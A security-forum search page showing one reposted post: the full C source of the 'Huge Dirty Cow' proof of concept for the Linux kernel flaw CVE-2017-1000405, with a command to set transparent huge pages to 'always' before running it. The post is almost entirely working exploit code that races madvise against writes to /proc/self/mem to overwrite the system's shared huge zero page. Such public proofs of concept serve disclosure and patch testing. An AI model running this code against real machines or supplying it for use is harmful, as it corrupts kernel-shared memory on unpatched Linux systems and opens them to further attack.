Jump to content

Search the Community

Showing results for tags 'cve-2017-1000405'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
    • Cryptocurrency
  • Cumparaturi online's Topics
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Cumparaturi online's Test
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Location


Interests


Biography


Location


Interests


Occupation

Found 1 result

  1. "Huge Dirty Cow" POC A POC for the Huge Dirty Cow vulnerability (CVE-2017-1000405). Full details can be found here. Before running, make sure to set transparent huge pages to "always": echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled Download HugeDirtyCowPOC-master.zip mirror: // // The Huge Dirty Cow POC. This program overwrites the system's huge zero page. // Compile with "gcc -pthread main.c" // // November 2017 // Bindecy // #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sched.h> #include <string.h> #include <pthread.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #define MAP_BASE ((void *)0x4000000) #define MAP_SIZE (0x200000) #define MEMESET_VAL (0x41) #define PAGE_SIZE (0x1000) #define TRIES_PER_PAGE (20000000) struct thread_args { char *thp_map; char *thp_chk_map; off_t off; char *buf_to_write; int stop; int mem_fd1; int mem_fd2; }; typedef void * (*pthread_proc)(void *); void *unmap_and_read_thread(struct thread_args *args) { char c; int i; for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page. memcpy(&c, args->thp_map + args->off, sizeof(c)); read(args->mem_fd2, &c, sizeof(c)); lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET); usleep(10); // We placed the zero page and marked its PMD as dirty. // Give get_user_pages() another chance before madvise()-ing again. } return NULL; } void *write_thread(struct thread_args *args) { int i; for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET); madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail. write(args->mem_fd1, args->buf_to_write, PAGE_SIZE); } return NULL; } void *wait_for_success(struct thread_args *args) { while (args->thp_chk_map[args->off] != MEMESET_VAL) { madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED); sched_yield(); } args->stop = 1; return NULL; } int main() { struct thread_args args; void *thp_chk_map_addr; int ret; // Mapping base should be a multiple of the THP size, so we can work with the whole huge page. args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (args.thp_map == MAP_FAILED) { perror("[!] mmap()"); return -1; } if (args.thp_map != MAP_BASE) { fprintf(stderr, "[!] Didn't get desired base address for the vulnerable mapping.\n"); goto err_unmap1; } printf("[*] The beginning of the zero huge page: %lx\n", *(unsigned long *)args.thp_map); thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (args.thp_chk_map == MAP_FAILED) { perror("[!] mmap()"); goto err_unmap1; } if (args.thp_chk_map != thp_chk_map_addr) { fprintf(stderr, "[!] Didn't get desired base address for the check mapping.\n"); goto err_unmap2; } ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE); if (ret) { perror("[!] madvise()"); goto err_unmap2; } args.buf_to_write = malloc(PAGE_SIZE); if (!args.buf_to_write) { perror("[!] malloc()"); goto err_unmap2; } memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE); args.mem_fd1 = open("/proc/self/mem", O_RDWR); if (args.mem_fd1 < 0) { perror("[!] open()"); goto err_free; } args.mem_fd2 = open("/proc/self/mem", O_RDWR); if (args.mem_fd2 < 0) { perror("[!] open()"); goto err_close1; } printf("[*] Racing. Gonna take a while...\n"); args.off = 0; // Overwrite every single page while (args.off < MAP_SIZE) { pthread_t threads[3]; args.stop = 0; ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args); ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args); ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args); if (ret) { perror("[!] pthread_create()"); goto err_close2; } pthread_join(threads[0], NULL); // This call will return only after the overwriting is done pthread_join(threads[1], NULL); pthread_join(threads[2], NULL); args.off += PAGE_SIZE; printf("[*] Done 0x%lx bytes\n", args.off); } printf("[*] Success!\n"); err_close2: close(args.mem_fd2); err_close1: close(args.mem_fd1); err_free: free(args.buf_to_write); err_unmap2: munmap(args.thp_chk_map, MAP_SIZE); err_unmap1: munmap(args.thp_map, MAP_SIZE); if (ret) { fprintf(stderr, "[!] Exploit failed.\n"); } return ret; } Source: https://github.com/bindecy/HugeDirtyCowPOC
×